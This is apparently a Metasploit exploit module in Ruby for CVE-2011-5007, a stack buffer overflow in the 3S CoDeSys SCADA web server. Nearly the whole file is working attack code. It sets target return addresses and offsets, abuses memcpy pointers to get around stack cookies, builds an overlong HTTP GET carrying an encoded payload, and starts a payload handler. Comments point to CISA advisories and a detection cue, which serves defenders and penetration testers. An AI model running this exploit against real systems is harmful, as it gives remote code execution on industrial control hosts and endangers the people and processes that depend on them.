##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2011-5007, a stack buffer overflow in the 3S CoDeSys
# web server (CmpWebServer). The trigger is a single HTTP GET whose request
# path is overlong; see `exploit` for the exact layout. `check` can only
# fingerprint the server banner, not the installed version, so it reports
# Detected rather than Vulnerable.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (targets, payload constraints, references) and
  # the only option this module adds, RPORT (default 8080).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a remote stack buffer overflow vulnerability in
          3S-Smart Software Solutions product CoDeSys Scada Web Server Version
          1.1.9.9. This vulnerability affects versions 3.4 SP4 Patch 2 and
          earlier.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Luigi Auriemma', # Original discovery and poc
          'Celil UNUVER',
          'TecR0c <roccogiovannicalvi[at]gmail.com>', # Module Metasploit
          'sinn3r',
          'Michael Coppola'
        ],
        'References' => [
          [ 'CVE', '2011-5007'],
          [ 'OSVDB', '77387'],
          [ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],
          [ 'EDB', '18187' ],
          # Vendor/CISA guidance and patch information for defenders
          [ 'URL', 'https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-336-01A' ],
          # The following clarifies why two people are credited for the discovery
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-12-006-01']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => false
        },
        'Platform' => 'win',
        'Payload' => {
          'size' => 650,
          # Bytes that would terminate or alter the request path: NUL, TAB, LF,
          # '?', space, '#', '^', '%', ':' and '\' (the payload rides in the URI).
          'BadChars' => "\x00\x09\x0a\x3f\x20\x23\x5e\x25\x3a\x5c",
        },

        'Targets' => [
          [
            'CoDeSys v2.3 on Windows XP SP3',
            {
              'Ret' => 0x7E4456F7, # jmp esp user32
              'Offset' => 775
            }
          ],
          [
            'CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3',
            {
              # Abuse a memcpy() call to circumvent stack cookies
              # (Src/Dest are consumed by `exploit` as extra pointer fields;
              # their meaning is not shown here beyond that comment)
              'Offset' => 525,
              'Ret' => 0x02CDFD68,
              'Src' => 0x02CDFD58,
              'Dest' => 0x02CDFA14
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2011-12-02',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(8080)])
  end

  # Banner check: sends a plain GET / and looks for the "3S_WebServer" marker
  # in whatever the server returns. The response carries no version string,
  # so the best this can report is Detected (product present), never
  # Vulnerable; Safe means the marker was absent or nothing was received.
  #
  # @return [Exploit::CheckCode] Detected or Safe
  def check
    connect
    sock.put("GET / HTTP/1.1\r\nHost: #{rhost}\r\n\r\n")
    res = sock.get_once
    disconnect

    # Can't flag the web server as vulnerable, because it doesn't
    # give us a version
    vprint_line(res.to_s) # res may be nil if the server answered nothing
    if res.to_s =~ /3S_WebServer/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Builds the overlong request path for the selected target and sends it in
  # a single HTTP/1.0 GET.
  #
  # Both layouts start with target['Offset'] bytes of filler, then the
  # target's Ret value, an 8-byte NOP sled and the encoded payload. The v3.4
  # target inserts three more little-endian dwords (Src, Dest, 0x7FFFFFFF)
  # between Ret and the sled, per the "abuse a memcpy()" note on that target,
  # and appends a literal backslash + 'a'.
  #
  # Detection note: the path is several hundred bytes of filler plus the
  # payload (up to 650 bytes), far beyond an ordinary URI for this server,
  # and the filler is random text rather than a real resource name.
  def exploit
    connect

    if target.name =~ /v2\.3/
      buffer = rand_text(target['Offset'])
      buffer << [target.ret].pack('V')
      buffer << make_nops(8)
      buffer << payload.encoded

    else
      # CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3
      # Alphanumeric filler only, so none of the BadChars land in the path.
      buffer = rand_text_alphanumeric(target['Offset'])
      buffer << [target.ret].pack('V')
      buffer << [target['Src']].pack('V')
      buffer << [target['Dest']].pack('V')
      buffer << [0x7FFFFFFF].pack('V') # Satisfy signed comparison
      buffer << make_nops(8)
      buffer << payload.encoded
      buffer << "\\a" # literal backslash followed by 'a', not a bell character
    end

    # HTTP/1.0 and an extra CRLF; the whole buffer is the request path.
    sploit = "GET /#{buffer} HTTP/1.0\r\n\r\n\r\n"

    print_status("Trying target #{target.name}...")
    sock.put(sploit)
    res = sock.get_once(-1, 5) # read whatever comes back, 5 s timeout
    print_line(res) unless res.nil?

    handler
    disconnect
  end
end

=begin
target.ret verified on:
- Win XP SP3 unpatched
- Win XP SP3 fully-patched
- Win XP SP3 fully-patched with Office 2007 Ultimate SP2 installed
=end